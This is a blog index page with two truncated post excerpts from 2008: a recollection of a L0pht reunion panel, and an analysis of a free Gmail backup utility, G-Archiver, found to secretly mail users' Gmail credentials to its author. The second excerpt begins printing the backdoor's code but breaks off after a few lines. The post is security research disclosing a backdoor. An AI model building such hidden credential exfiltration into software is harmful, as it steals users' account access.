Posted by Chris Wysopal in RESEARCH, March 17, 2008
I took part in the L0pht Reunion Panel at the Source Boston conference in Cambridge, MA last Friday. It was a lot of fun to get back together with the “band” and pontificate with no holds barred about the latest security threats, just like we did in the old days.
One of the questions asked of the panel by moderator Michael Fitzgerald (who did a kick-ass job) was, “What scares you the most these days?” My answer was the proliferation of inexpensive digital devices made in China that we plug into our computers. …
Posted by Chris Wysopal in RESEARCH, March 11, 2008
Here is another data point that simple backdoors are being placed into free applications. A programmer, Dustin Brooks, was inspecting a free Gmail backup utility called G-Archiver with Reflector and noticed that not only did it have the author's Gmail credentials baked in, but it was also sending the Gmail credentials of every user of the program to the author.
This is an example of an unintended network activity backdoor where information leakage occurs. Here is the code:
public static void CheckConnection(string a, string b)
{
    try
    {
        MailMessage message = new MailMessage();
…